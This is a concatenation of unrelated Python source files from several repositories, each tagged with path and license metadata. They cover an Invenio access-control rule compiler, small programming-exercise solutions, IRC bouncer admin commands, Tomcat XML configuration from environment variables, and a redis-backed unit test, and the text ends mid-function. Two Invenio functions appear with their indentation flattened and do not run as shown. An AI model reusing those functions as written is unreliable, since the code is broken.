from invenio.dbquery import run_sql, blob_to_string
from invenio.config import CFG_CERN_SITE
from invenio.access_control_config import CFG_ACC_EMPTY_ROLE_DEFINITION_SRC, \
CFG_ACC_EMPTY_ROLE_DEFINITION_SER, CFG_ACC_EMPTY_ROLE_DEFINITION_OBJ
# INTERFACE
def compile_role_definition(firerole_def_src):
    """ Given a text in which every row contains a rule it returns the compiled
    object definition.
    Rules have the following syntax:
    allow|deny [not] field {list of one or more (double)quoted string or regexp}
    or allow|deny any
    Every row may contain a # sign followed by a comment which are discarded.
    Field could be any key contained in a user_info dictionary. If the key does
    not exist in the dictionary, the rule is skipped.
    The first rule which matches return.

    Returns a tuple (default_allow_p, rules) where each rule is
    (allow_p, not_p, field, expressions_list).
    Raises InvenioWebAccessFireroleError on any syntax error.
    """
    line = 0
    ret = []
    default_allow_p = False
    if not firerole_def_src or not firerole_def_src.strip():
        firerole_def_src = CFG_ACC_EMPTY_ROLE_DEFINITION_SRC
    for row in firerole_def_src.split('\n'):
        line += 1
        row = row.strip()
        if not row:
            continue
        # Strip trailing comments before parsing.
        clean_row = _no_comment_re.sub('', row)
        if clean_row:
            # An 'allow any'/'deny any' rule sets the default and ends parsing.
            g = _any_rule_re.match(clean_row)
            if g:
                default_allow_p = g.group('command').lower() == 'allow'
                break
            g = _rule_re.match(clean_row)
            if g:
                allow_p = g.group('command').lower() == 'allow'
                not_p = g.group('not') != None
                field = g.group('field').lower()
                # Renaming groups to group
                for alias_item in _aliasTable:
                    if field in alias_item:
                        field = alias_item[0]
                        break
                if field.startswith('precached_'):
                    raise InvenioWebAccessFireroleError("Error while compiling rule %s (line %s): %s is a reserved key and can not be used in FireRole rules!" % (row, line, field))
                expressions = g.group('expression')+g.group('more_expressions')
                expressions_list = []
                for expr in _expressions_re.finditer(expressions):
                    expr = expr.group()
                    if field in ('from', 'until'):
                        # Dates are stored as epoch timestamps.
                        try:
                            expressions_list.append((False, time.mktime(time.strptime(expr[1:-1], '%Y-%m-%d'))))
                        except Exception, msg:
                            raise InvenioWebAccessFireroleError("Syntax error while compiling rule %s (line %s): %s is not a valid date with format YYYY-MM-DD because %s!" % (row, line, expr, msg))
                    elif expr[0] == '/':
                        # /.../ denotes a case-insensitive regular expression.
                        try:
                            expressions_list.append((True, re.compile(expr[1:-1], re.I)))
                        except Exception, msg:
                            raise InvenioWebAccessFireroleError("Syntax error while compiling rule %s (line %s): %s is not a valid re because %s!" % (row, line, expr, msg))
                    else:
                        # remote_ip values containing '/' are CIDR groups.
                        if field == 'remote_ip' and '/' in expr[1:-1]:
                            try:
                                expressions_list.append((False, _ip_matcher_builder(expr[1:-1])))
                            except Exception, msg:
                                raise InvenioWebAccessFireroleError("Syntax error while compiling rule %s (line %s): %s is not a valid ip group because %s!" % (row, line, expr, msg))
                        else:
                            expressions_list.append((False, expr[1:-1]))
                expressions_list = tuple(expressions_list)
                if field in ('from', 'until'):
                    # Date rules take exactly one date and no 'not'.
                    if len(expressions_list) != 1:
                        raise InvenioWebAccessFireroleError("Error when compiling rule %s (line %s): exactly one date is expected when using 'from' or 'until', but %s were found" % (row, line, len(expressions_list)))
                    if not_p:
                        raise InvenioWebAccessFireroleError("Error when compiling rule %s (line %s): 'not' is not allowed when using 'from' or 'until'" % (row, line))
                ret.append((allow_p, not_p, field, expressions_list))
            else:
                raise InvenioWebAccessFireroleError("Syntax error while compiling rule %s (line %s): not a valid rule!" % (row, line))
    return (default_allow_p, tuple(ret))
def repair_role_definitions():
    """ Recompile every role definition from its stored source.

    Needed when a Python upgrade breaks compatibility of the pickled,
    compiled definitions kept in the database.
    """
    for role_id, definition_src in run_sql("SELECT id, firerole_def_src FROM accROLE"):
        compiled = serialize(compile_role_definition(definition_src))
        run_sql("UPDATE accROLE SET firerole_def_ser=%s WHERE id=%s", (compiled, role_id))
def store_role_definition(role_id, firerole_def_ser, firerole_def_src):
    """ Store a compiled serialized definition and its source in the database
    alongside the role to which it belongs.
    @param role_id: the role_id
    @param firerole_def_ser: the serialized compiled definition
    @param firerole_def_src: the sources from which the definition was taken
    """
    run_sql("UPDATE accROLE SET firerole_def_ser=%s, firerole_def_src=%s WHERE id=%s", (firerole_def_ser, firerole_def_src, role_id))
def load_role_definition(role_id):
    """ Load the definition corresponding to a role. If the compiled definition
    is corrupted it tries to repair the definitions from their sources and
    tries again to return the definition.
    @param role_id: id of the role in accROLE
    @return: a deserialized compiled role definition, or the empty definition
        if the role does not exist
    """
    res = run_sql("SELECT firerole_def_ser FROM accROLE WHERE id=%s", (role_id, ), 1)
    if res:
        try:
            return deserialize(res[0][0])
        except Exception:
            ## Something bad might have happened? (Update of Python?)
            ## Recompile everything from source and retry once.
            repair_role_definitions()
            res = run_sql("SELECT firerole_def_ser FROM accROLE WHERE id=%s", (role_id, ), 1)
            if res:
                return deserialize(res[0][0])
    return CFG_ACC_EMPTY_ROLE_DEFINITION_OBJ
def acc_firerole_extract_emails(firerole_def_obj):
"""
Best effort function to extract all the possible email addresses
authorized by the given firerole.
"""
authorized_emails = set()
try:
default_allow_p, rules = firerole_def_obj
for (allow_p, not_p, field, expressions_list) in rules: # for every rule
if not_p:
continue
if field == 'group':
for reg_p, expr in expressions_list:
if reg_p:
continue
if CFG_CERN_SITE and expr.endswith(' [CERN]'):
authorized_emails.add(expr[:len(' [CERN]')].lower().strip() + '@cern.ch')
emails = run_sql("SELECT user.email FROM usergroup JOIN user_usergroup ON usergroup.id=user_usergroup.id_usergroup JOIN user ON user.id=user_usergroup.id_user WHERE usergroup.name=%s", (expr, ))
for email in emails:
authorized_emails.add(email[0].lower().strip())
elif field == 'email':
for reg_p, expr in expressions_list:
if reg_p:
continue
authorized_emails.add(expr.lower().strip())
elif field == 'uid':
for reg_p, expr in expressions_list:
if reg_p:
continue
email = run_sql("SELECT email FROM user WHERE id=%s", (expr, ))
if email:
authorized_emails.add(email[0][0].lower().strip())
return authorized_emails
except Exception, msg:
raise InvenioWebAccessFireroleError, msg
def acc_firerole_check_user(user_info, firerole_def_obj):
    """ Given a user_info dictionary, it matches the rules inside the
    deserialized, compiled definition in order to discover if the current user
    matches the roles corresponding to this definition.
    @param user_info: a dict produced by collect_user_info which contains every
    info about a user
    @param firerole_def_obj: a compiled deserialized definition produced by
    compile_role_definition
    @return: True if the user matches the definition, False otherwise.
    """
    try:
        default_allow_p, rules = firerole_def_obj
        for (allow_p, not_p, field, expressions_list) in rules: # for every rule
            group_p = field == 'group' # Is it related to group?
            ip_p = field == 'remote_ip' # Is it related to Ips?
            until_p = field == 'until' # Is it related to dates?
            from_p = field == 'from' # Idem.
            next_expr_p = False # Silly flag to break 2 for cycles
            # Skip rules on fields the user_info does not carry (except dates,
            # which are checked against the clock, not user_info).
            if not user_info.has_key(field) and not from_p and not until_p:
                continue
            for reg_p, expr in expressions_list: # For every element in the rule
                if group_p: # Special case: groups
                    if reg_p: # When it is a regexp
                        for group in user_info[field]: # iterate over every group
                            if expr.match(group): # if it matches
                                if not_p: # if must not match
                                    next_expr_p = True # let's skip to next expr
                                    break
                                else: # Ok!
                                    return allow_p
                        if next_expr_p:
                            break # I said: let's skip to next rule ;-)
                    elif expr.lower() in [group.lower() for group in user_info[field]]: # Simple expression then just check for expr in groups
                        if not_p: # If expr is in groups then if must not match
                            break # let's skip to next expr
                        else: # Ok!
                            return allow_p
                elif reg_p: # Not a group, then easier. If it's a regexp
                    if expr.match(user_info[field]): # if it matches
                        if not_p: # If must not match
                            break # Let's skip to next expr
                        else:
                            return allow_p # Ok!
                elif ip_p and type(expr) == type(()): # If it's just a simple expression but an IP!
                    if _ipmatch(user_info['remote_ip'], expr): # Then if Ip matches
                        if not_p: # If must not match
                            break # let's skip to next expr
                        else:
                            return allow_p # ok!
                elif until_p:
                    # 'until': rule applies only before the stored timestamp.
                    if time.time() <= expr:
                        if allow_p:
                            break
                        else:
                            return False
                    elif allow_p:
                        return False
                    else:
                        break
                elif from_p:
                    # 'from': rule applies only after the stored timestamp.
                    if time.time() >= expr:
                        if allow_p:
                            break
                        else:
                            return False
                    elif allow_p:
                        return False
                    else:
                        break
                elif expr.lower() == user_info[field].lower(): # Finally the easiest one!!
                    if not_p: # ...
                        break
                    else: # ...
                        return allow_p # ...
            if not_p and not next_expr_p: # Nothing has matched and we got not
                return allow_p # Then the whole rule matched!
    except Exception, msg:
        raise InvenioWebAccessFireroleError, msg
    return default_allow_p # By default we allow ;-) it's an OpenAccess project
def serialize(firerole_def_obj):
    """ Serialize and compress a compiled definition.

    Empty or falsy definitions map to the pre-serialized empty definition.
    """
    if not firerole_def_obj or firerole_def_obj == CFG_ACC_EMPTY_ROLE_DEFINITION_OBJ:
        return CFG_ACC_EMPTY_ROLE_DEFINITION_SER
    return compress(cPickle.dumps(firerole_def_obj, -1))
def deserialize(firerole_def_ser):
    """ Decompress and deserialize a definition.

    A falsy blob maps to the empty compiled definition.
    """
    if not firerole_def_ser:
        return CFG_ACC_EMPTY_ROLE_DEFINITION_OBJ
    return cPickle.loads(decompress(blob_to_string(firerole_def_ser)))
# IMPLEMENTATION

# Comment finder: matches a trailing, unescaped '#' comment for stripping.
_no_comment_re = re.compile(r'[\s]*(?<!\\)#.*')
# Rule dissecter: captures command (allow/deny), optional 'not', field name,
# and one or more quoted strings or /regexps/.
_rule_re = re.compile(r'(?P<command>allow|deny)[\s]+(?:(?P<not>not)[\s]+)?(?P<field>[\w]+)[\s]+(?P<expression>(?<!\\)\'.+?(?<!\\)\'|(?<!\\)\".+?(?<!\\)\"|(?<!\\)\/.+?(?<!\\)\/)(?P<more_expressions>([\s]*,[\s]*((?<!\\)\'.+?(?<!\\)\'|(?<!\\)\".+?(?<!\\)\"|(?<!\\)\/.+?(?<!\\)\/))*)(?:[\s]*(?<!\\).*)?', re.I)
# Matches the catch-all 'allow any' / 'deny all' style rules.
_any_rule_re = re.compile(r'(?P<command>allow|deny)[\s]+(any|all)[\s]*', re.I)
# Sub expression finder: one quoted string or /regexp/ at a time.
_expressions_re = re.compile(r'(?<!\\)\'.+?(?<!\\)\'|(?<!\\)\".+?(?<!\\)\"|(?<!\\)\/.+?(?<!\\)\/')
def _mkip (ip):
""" Compute a numerical value for a dotted IP """
num = 0L
for i in map (int, ip.split ('.')):
num = (num << 8) + i
return num
# All-ones 32-bit value used when building netmasks.
_full = 2L ** 32 - 1
# Field-name aliases: any name in a tuple is normalized to its first entry.
_aliasTable = (('group', 'groups'), )
def _ip_matcher_builder(group):
    """ Compile a string "ip/bitmask" (i.e. 127.0.0.0/24)
    @param group: a classical "ip/bitmask" string
    @return: a tuple containing the gip and mask in a binary version.
    @raise InvenioWebAccessFireroleError: if the masked IP has host bits set.

    The py2-only 'raise X, msg' form and the '2L' long literal were replaced
    by equivalents valid on both Python 2 and Python 3; behavior unchanged.
    """
    gip, gmk = group.split('/')
    gip = _mkip(gip)
    gmk = int(gmk)
    mask = (_full - (2 ** (32 - gmk) - 1))
    if not (gip & mask == gip):
        raise InvenioWebAccessFireroleError("Netmask does not match IP (%Lx %Lx)" % (gip, mask))
    return (gip, mask)
def _ipmatch(ip, ip_matcher):
    """ Check if an ip matches an ip_group.
    @param ip: the ip to check, as a dotted-quad string
    @param ip_matcher: a compiled (gip, mask) tuple produced by _ip_matcher_builder
    @return: True if ip matches, False otherwise
    """
    # Mask the candidate IP and compare with the group's network address.
    return _mkip(ip) & ip_matcher[1] == ip_matcher[0]
| pombredanne/invenio | modules/webaccess/lib/access_control_firerole.py | Python | gpl-2.0 | 15,550 |
import sys
import math
# dataset_3363_3: find the most frequent (case-insensitive) word in the
# file named on stdin and write "<word> <count>" to output_2.txt.
from collections import Counter

filename = input().strip() + ".txt"
with open(filename, 'r') as src:
    # split() on the whole lowercased text yields the same tokens as
    # stripping each line and joining with spaces.
    words = src.read().lower().split()

top_word, top_count = Counter(words).most_common(1)[0]

with open("output_2.txt", 'w') as out:
    out.write("{} {}\n".format(top_word, top_count))
| nizhikebinesi/code_problems_python | stepik/programming_on_python/3.4/task_2.py | Python | gpl-2.0 | 417 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# @Author: Adrien Chardon
# @Date: 2014-11-16 14:29:10
# @Last Modified by: Adrien Chardon
# @Last Modified time: 2014-11-16 16:31:32
import time as t
################################################################################
# Usefull functions
################################################################################
# Sentinel distance treated as "unreachable"; assumes every real path
# in the input graph is shorter than this.
infinity = 1000
# wrapper: nodes are numbered from 1, the backing list is 0-indexed
def getObjectInList(nodes, id):
    return nodes[id-1]
# Return all child nodes that can be directly reached from the given node.
def getChildOfNode(data, node):
    """List the 'end' of every edge whose 'start' is node, in input order."""
    return [edge['end'] for edge in data if edge['start'] == node]
# Return the time for traveling directly from node1 to node2
# (infinity when there is no direct link).
def getDist(data, node1, node2):
    """Time of the first edge node1 -> node2 found, or infinity if absent."""
    times = [edge['time'] for edge in data
             if edge['start'] == node1 and edge['end'] == node2]
    if times:
        return times[0]
    return infinity
################################################################################
# main
################################################################################
# get the shortest travel time for one (start, end) request
def expert_itinerant_one(nb_node, nb_link, nb_request, data, start, end):
    """Label-correcting shortest-path search from `start` to `end`.

    Each node tracks its best known distance from `start` and the node it was
    reached from; nodes whose distance improves are re-queued until no
    improvement remains.  Returns `infinity` when `end` is unreachable.
    """
    nodes = []
    for _ in range(nb_node):
        tmp = {
            'distanceFromStart': infinity,
            'origin': -1,  # -1 means "never reached"
        }
        nodes.append(tmp)

    # Seed the search at the start node.
    getObjectInList(nodes, start)['distanceFromStart'] = 0
    getObjectInList(nodes, start)['origin'] = 0

    notVisited = [start]
    while notVisited != []:
        cur_id = notVisited.pop()
        cur = getObjectInList(nodes, cur_id)
        for child_id in getChildOfNode(data, cur_id):
            child = getObjectInList(nodes, child_id)
            # Relax the edge: first visit, or a strictly shorter path found.
            if (child['origin'] == -1) or (cur['distanceFromStart'] + getDist(data, cur_id, child_id) < child['distanceFromStart']):
                child['distanceFromStart'] = cur['distanceFromStart'] + getDist(data, cur_id, child_id)
                child['origin'] = cur_id
                if child_id not in notVisited:
                    notVisited.append(child_id)

    return getObjectInList(nodes, end)['distanceFromStart']
def expert_itinerant(nb_node, nb_link, nb_request, data, request):
    # Print the shortest travel time for each (start, end) request, in order.
    for dic in request:
        print expert_itinerant_one(nb_node, nb_link, nb_request, data, dic['start'], dic['end'])
if __name__ == '__main__':
    # Input format: first line "nb_node nb_link nb_request", then nb_link
    # lines "start end time", then nb_request lines "start end".
    nb_node, nb_link, nb_request = (int(i) for i in raw_input().split())

    data = []
    for _ in range(nb_link):
        start, end, time = (int(i) for i in raw_input().split())
        tmp = {
            'start': start,
            'end': end,
            'time': time,
        }
        data.append(tmp)
    # Sort edges by source node (groups each node's outgoing edges together).
    data.sort(key=lambda tup: tup['start'])

    request = []
    for _ in range(nb_request):
        start, end = (int(i) for i in raw_input().split())
        tmp = {
            'start': start,
            'end': end,
        }
        request.append(tmp)

    expert_itinerant(nb_node, nb_link, nb_request, data, request)
| Nodraak/Prologin2015 | 4_Expert-itinerant.py | Python | gpl-2.0 | 3,054 |
#!/usr/bin/env python2
# -*- coding: iso-8859-1 -*-
# WebKOM - a web based LysKOM client
#
# Copyright (C) 2000 by Peter Åstrand
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2
# of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
from webkom_constants import VERSION

# Rewrite webkom.spec from its template, replacing the "Version:" line
# with the current WebKOM version.  Files are now closed reliably and the
# manual while/readline loop was replaced by plain file iteration.
template = open("webkom.spec.template")
new = open("webkom.spec", "w")
try:
    for line in template:
        if line.find("Version:") != -1:
            line = "Version: " + VERSION + "\n"
        new.write(line)
finally:
    template.close()
    new.close()
| astrand/webkom | set_version.py | Python | gpl-2.0 | 1,081 |
# sbncng - an object-oriented framework for IRC
# Copyright (C) 2011 Gunnar Beutner
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
import string
import random
from sbnc.proxy import Proxy
from sbnc.plugin import Plugin, ServiceRegistry
from plugins.ui import UIPlugin, UIAccessCheck
# Resolve the shared Proxy and UI plugin singletons at import time.
# NOTE(review): presumably both services are registered before this module
# is imported -- confirm plugin load order.
proxy_svc = ServiceRegistry.get(Proxy.package)
ui_svc = ServiceRegistry.get(UIPlugin.package)
class AdminCommandPlugin(Plugin):
    """Implements basic admin commands."""

    package = 'info.shroudbnc.plugins.admincmd'
    name = "AdminCmd"
    description = __doc__

    def __init__(self):
        # Register every admin command with the UI plugin; all of them are
        # restricted to admins via UIAccessCheck.admin.
        ui_svc.register_command('adduser', self._cmd_adduser_handler, 'Admin', 'creates a new user',
                                'Syntax: adduser <username> [password]\nCreates a new user.', UIAccessCheck.admin)
        ui_svc.register_command('admin', self._cmd_admin_handler, 'Admin', 'gives someone admin privileges',
                                'Syntax: admin <username>\nGives admin privileges to a user.', UIAccessCheck.admin)
        ui_svc.register_command('broadcast', self._cmd_broadcast_handler, 'Admin', 'sends a global notice to all bouncer users',
                                'Syntax: broadcast <text>\nSends a notice to all currently connected users.', UIAccessCheck.admin)
        ui_svc.register_command('deluser', self._cmd_deluser_handler, 'Admin', 'removes a user',
                                'Syntax: deluser <username>\nDeletes a user.', UIAccessCheck.admin)
        ui_svc.register_command('die', self._cmd_die_handler, 'Admin', 'terminates the bouncer',
                                'Syntax: die\nTerminates the bouncer.', UIAccessCheck.admin)
        # Help text aligned with the handler: the password argument is
        # optional and auto-generated when omitted.
        ui_svc.register_command('resetpass', self._cmd_resetpass_handler, 'Admin', 'sets a user\'s password',
                                'Syntax: resetpass <username> [password]\nResets another user\'s password.', UIAccessCheck.admin)
        ui_svc.register_command('simul', self._cmd_simul_handler, 'Admin', 'simulates a command on another user\'s connection',
                                'Syntax: simul <username> <command>\nExecutes a command in another user\'s context.', UIAccessCheck.admin)
        ui_svc.register_command('suspend', self._cmd_suspend_handler, 'Admin', 'suspends a user',
                                'Syntax: suspend <username> [reason]\nSuspends an account. An optional reason can be specified.', UIAccessCheck.admin)
        ui_svc.register_command('unadmin', self._cmd_unadmin_handler, 'Admin', 'removes someone\'s admin privileges',
                                'Syntax: unadmin <username>\nRemoves someone\'s admin privileges.', UIAccessCheck.admin)
        ui_svc.register_command('unsuspend', self._cmd_unsuspend_handler, 'Admin', 'unsuspends a user',
                                'Syntax: unsuspend <username>\nRemoves a suspension from the specified account.', UIAccessCheck.admin)
        ui_svc.register_command('who', self._cmd_who_handler, 'Admin', 'shows users',
                                'Syntax: who\nShows a list of all users.', UIAccessCheck.admin)

    @staticmethod
    def _random_password(length=12):
        """Return a random alphanumeric password of the given length.

        NOTE(review): the random module is not a CSPRNG; consider the
        secrets module for production password generation.
        """
        letters = string.ascii_letters + string.digits
        return ''.join([random.choice(letters) for _ in range(length)])

    def _cmd_adduser_handler(self, clientobj, params, notice):
        """Create a new account; generates a password when none is given."""
        if len(params) < 1:
            ui_svc.send_sbnc_reply(clientobj, 'Syntax: adduser <username> [password]', notice)
            return

        user = params[0]

        if len(params) >= 2:
            password = params[1]
        else:
            password = AdminCommandPlugin._random_password()

        if user in proxy_svc.users:
            ui_svc.send_sbnc_reply(clientobj, 'The specified username is already in use.', notice)
            return

        userobj = proxy_svc.create_user(user)
        userobj.password = password

        if len(params) >= 2:
            ui_svc.send_sbnc_reply(clientobj, 'Done.', notice)
        else:
            # Echo the generated password back so the admin can pass it on.
            ui_svc.send_sbnc_reply(clientobj, 'Done.' +
                                   ' The new user\'s password is \'%s\'.' % (password), notice)

    def _cmd_admin_handler(self, clientobj, params, notice):
        """Grant admin privileges to an existing user."""
        if len(params) < 1:
            ui_svc.send_sbnc_reply(clientobj, 'Syntax: admin <username>', notice)
            return

        user = params[0]

        if user not in proxy_svc.users:
            ui_svc.send_sbnc_reply(clientobj, 'There\'s no such user.', notice)
            return

        userobj = proxy_svc.users[user]
        userobj.admin = True

        ui_svc.send_sbnc_reply(clientobj, 'Done.', notice)

    def broadcast(self, message):
        """Send a notice with the given message to every connected client."""
        for userobj in proxy_svc.users.values():
            for subclientobj in userobj.client_connections:
                ui_svc.send_sbnc_reply(subclientobj, 'Global message: %s' % (message), notice=False)

    def _cmd_broadcast_handler(self, clientobj, params, notice):
        """Broadcast the joined parameters to all users."""
        if len(params) < 1:
            ui_svc.send_sbnc_reply(clientobj, 'Syntax: broadcast <text>', notice)
            return

        self.broadcast(' '.join(params))
        ui_svc.send_sbnc_reply(clientobj, 'Done.', notice)

    def _cmd_deluser_handler(self, clientobj, params, notice):
        """Delete an existing account."""
        if len(params) < 1:
            ui_svc.send_sbnc_reply(clientobj, 'Syntax: deluser <username>', notice)
            return

        user = params[0]

        if user not in proxy_svc.users:
            ui_svc.send_sbnc_reply(clientobj, 'There\'s no such user.', notice)
            return

        proxy_svc.remove_user(user)

        # BUG FIX: the 'notice' argument was missing here, unlike every
        # other handler's reply.
        ui_svc.send_sbnc_reply(clientobj, 'Done.', notice)

    def _cmd_die_handler(self, clientobj, params, notice):
        """Terminate the bouncer (not yet implemented)."""
        # TODO: implement
        pass

    def _cmd_resetpass_handler(self, clientobj, params, notice):
        """Reset a user's password; generates one when none is given."""
        if len(params) < 1:
            ui_svc.send_sbnc_reply(clientobj, 'Syntax: resetpass <username> [password]', notice)
            return

        user = params[0]

        if user not in proxy_svc.users:
            ui_svc.send_sbnc_reply(clientobj, 'There\'s no such user.', notice)
            return

        if len(params) >= 2:
            password = params[1]
        else:
            password = AdminCommandPlugin._random_password()

        userobj = proxy_svc.users[user]
        userobj.password = password

        if len(params) >= 2:
            ui_svc.send_sbnc_reply(clientobj, 'Done.', notice)
        else:
            ui_svc.send_sbnc_reply(clientobj, 'Done.' +
                                   ' The user\'s password was changed to \'%s\'.' % (password), notice)

    def _cmd_simul_handler(self, clientobj, params, notice):
        """Execute a command in another user's context (not yet implemented)."""
        if len(params) < 2:
            ui_svc.send_sbnc_reply(clientobj, 'Syntax: simul <username> <command>', notice)
            return

        # TODO: implement
        pass

    def _cmd_suspend_handler(self, clientobj, params, notice):
        """Suspend an account (not yet implemented)."""
        if len(params) < 1:
            ui_svc.send_sbnc_reply(clientobj, 'Syntax: suspend <username> [reason]', notice)
            return

        # TODO: implement
        pass

    def _cmd_unadmin_handler(self, clientobj, params, notice):
        """Revoke a user's admin privileges."""
        if len(params) < 1:
            ui_svc.send_sbnc_reply(clientobj, 'Syntax: unadmin <username>', notice)
            return

        user = params[0]

        if user not in proxy_svc.users:
            ui_svc.send_sbnc_reply(clientobj, 'There\'s no such user.', notice)
            return

        userobj = proxy_svc.users[user]
        userobj.admin = False

        ui_svc.send_sbnc_reply(clientobj, 'Done.', notice)

    def _cmd_unsuspend_handler(self, clientobj, params, notice):
        """Lift a suspension (not yet implemented)."""
        if len(params) < 1:
            ui_svc.send_sbnc_reply(clientobj, 'Syntax: unsuspend <username>', notice)
            return

        # TODO: implement
        pass

    def _cmd_who_handler(self, clientobj, params, notice):
        """List all users (not yet implemented)."""
        # TODO: implement
        pass
ServiceRegistry.register(AdminCommandPlugin)
| gunnarbeutner/sbncng | src/plugins/admincmd.py | Python | gpl-2.0 | 8,968 |
#!/usr/bin/python
"""Apply environment-variable overrides to the Ahsay RDR XML configuration."""
import os
from AhsayTools import XmlConf, env_true, env_false

# Map environment variables to server.xml > XPath > attribute.
server_conf = XmlConf("/rdr/conf/server.xml")
server_conf.set_attrib("Service/Connector", "port", "RDR_HTTP_PORT")
server_conf.set_attrib("Service/Connector[@scheme='https']", "port",
                       "RDR_HTTPS_PORT")
server_conf.set_attrib("Service/Connector[@scheme='https']", "keystoreFile",
                       "RDR_KEYSTORE_FILE")
server_conf.set_attrib("Service/Connector[@scheme='https']", "keystorePass",
                       "RDR_KEYSTORE_PASSWORD")
server_conf.set_attrib("Service/Connector[@scheme='https']",
                       "sslEnabledProtocols", "RDR_PROTOCOLS")

# If true, tomcat will trust the X-Forwarded-For header from IPs that match
# proxies
if "RDR_PROXIED" in os.environ:
    parent_xpath = "Service/Engine/Host"
    elem = "Valve"
    attr_key = "className"
    attr_val = "org.apache.catalina.valves.RemoteIpValve"
    xpath = '%s/%s[@%s="%s"]' % (parent_xpath, elem, attr_key, attr_val)
    # Raw strings: "\d" and "\." are regex escapes, not Python string
    # escapes (the non-raw originals triggered invalid-escape warnings).
    # This covers the RFC 1918 172.16.0.0/12 range.
    # NOTE(review): the dot after "172" is unescaped and matches any
    # character -- confirm whether that laxness is acceptable for tomcat.
    internal_proxies = (r"172.1[6-9]\.\d+\.\d+, "
                        r"172.2[0-9]\.\d+\.\d+, "
                        r"172.3[0-1]\.\d+\.\d+")

    if env_true("RDR_PROXIED"):
        if server_conf.find(xpath) is None:
            server_conf.subelement(parent_xpath, elem, {attr_key: attr_val,
                "internalProxies": internal_proxies})
    if env_false("RDR_PROXIED"):
        if server_conf.find(xpath) is not None:
            server_conf.remove(parent_xpath, elem, {attr_key: attr_val})

server_conf.write()
# Map environment variables to rdr.xml > XPath > attribute.
rdr_conf = XmlConf("/rdr/conf/rdr.xml")
_RDR_KEY = "Key[@name='com.ahsay.rdr.core.key.rdr.Rdr']"
_LICENSE_KEY = _RDR_KEY + "/Key[@name='com.ahsay.rdr.core.key.rdr.License']"
# (xpath, environment variable) pairs, each written to the 'data' attribute.
for _xpath, _env_var in [
        (_RDR_KEY + "/Value[@name='rsv-login-name']", "RDR_USERNAME"),
        (_RDR_KEY + "/Value[@name='rsv-password']", "RDR_PASSWORD"),
        (_RDR_KEY + "/Value[@name='rsv-hashed-password']", "RDR_PASSWORD_HASHED"),
        (_LICENSE_KEY + "/Value[@name='rsv-licensee-name']", "RDR_LICENSE_NAME"),
        (_LICENSE_KEY + "/Value[@name='rsv-license-key']", "RDR_LICENSE_KEY"),
]:
    rdr_conf.set_attrib(_xpath, "data", _env_var)
rdr_conf.write()
def _set_ssl_enforcement(env_var, web_xml_path, url_patterns, namespace=None):
    """Add or remove a <security-constraint> in a webapp's web.xml.

    Controlled by the environment variable env_var: when truthy, a
    CONFIDENTIAL transport guarantee is added for each pattern in
    url_patterns (if not already present); when falsy, the constraint is
    removed.  Does nothing when env_var is not set at all.
    """
    if env_var not in os.environ:
        return
    elem = "security-constraint"
    if namespace is not None:
        web_xml = XmlConf(web_xml_path, {'': namespace})
        xpath = '{%s}%s' % (namespace, elem)
    else:
        web_xml = XmlConf(web_xml_path)
        xpath = elem
    if env_true(env_var) and web_xml.find(xpath) is None:
        web_xml.subelement('.', elem)
        web_xml.subelement(elem, 'web-resource-collection')
        name_node = web_xml.subelement(
            '%s/web-resource-collection' % elem,
            'web-resource-name')
        name_node.text = 'Automatic SSL Forwarding'
        for pattern in url_patterns:
            pattern_node = web_xml.subelement(
                '%s/web-resource-collection' % elem,
                'url-pattern')
            pattern_node.text = pattern
        web_xml.subelement(elem, 'user-data-constraint')
        guarantee_node = web_xml.subelement(
            '%s/user-data-constraint' % elem,
            'transport-guarantee')
        guarantee_node.text = 'CONFIDENTIAL'
    if env_false(env_var) and web_xml.find(xpath) is not None:
        web_xml.remove('.', xpath)
    web_xml.write()


# Enforce SSL on /rdr/jsp/user/* and /rdr/jsp/system/* (namespaced web.xml).
_set_ssl_enforcement("RDR_ENFORCE_SSL", "/rdr/webapps/rdr/WEB-INF/web.xml",
                     ("/jsp/user/*", "/jsp/system/*"),
                     namespace="http://java.sun.com/xml/ns/j2ee")

# Enforce SSL on everything served by the ROOT webapp.
_set_ssl_enforcement("ROOT_ENFORCE_SSL", "/rdr/webapps/ROOT/WEB-INF/web.xml",
                     ("/*",))
| jeffre/docker-rdr | bootstrap/env_to_xml.py | Python | gpl-2.0 | 5,303 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"Fully test this module's functionality through the use of fixtures."
from megacosm.generators import Gem
import unittest2 as unittest
import fakeredis
from config import TestConfiguration
import fixtures
class TestGem(unittest.TestCase):
    """Exercise the Gem generator against fixture data in a fake redis."""

    def setUp(self):
        """Create a fake redis backend and load the gem fixtures into it."""
        self.redis = fakeredis.FakeRedis()
        fixtures.gem.import_fixtures(self)

    def tearDown(self):
        """Wipe the fake redis so tests stay independent."""
        self.redis.flushall()

    def test_random_gem(self):
        """A randomly generated gem has non-empty text, count, color, repr."""
        gem = Gem(self.redis)
        # assertNotEqual replaces the deprecated assertNotEquals alias.
        self.assertNotEqual('', gem.text)
        self.assertNotEqual('', gem.count)
        self.assertNotEqual('', gem.color)
        self.assertNotEqual('', str(gem))

    def test_static_gem(self):
        """Explicit parameters override randomization; text is capitalized."""
        gem = Gem(self.redis, {'text': 'foo bar', 'count': 3, 'color': 'green'})
        self.assertEqual('Foo bar', gem.text)
        self.assertEqual(3, gem.count)
        self.assertEqual('green', gem.color)
| CityGenerator/Megacosm-Generator | tests/test_gem.py | Python | gpl-2.0 | 980 |
#!python2.7
'''
Created on Jul 13, 2014
@author: cilia
'''
import os.path
import os
import time
import sys
import tempfile
from utils.path import loadModule
import utils
conf = utils.get_conf()
def run_task(task_conf):
    """Resolve and invoke a single task described by a config dict.

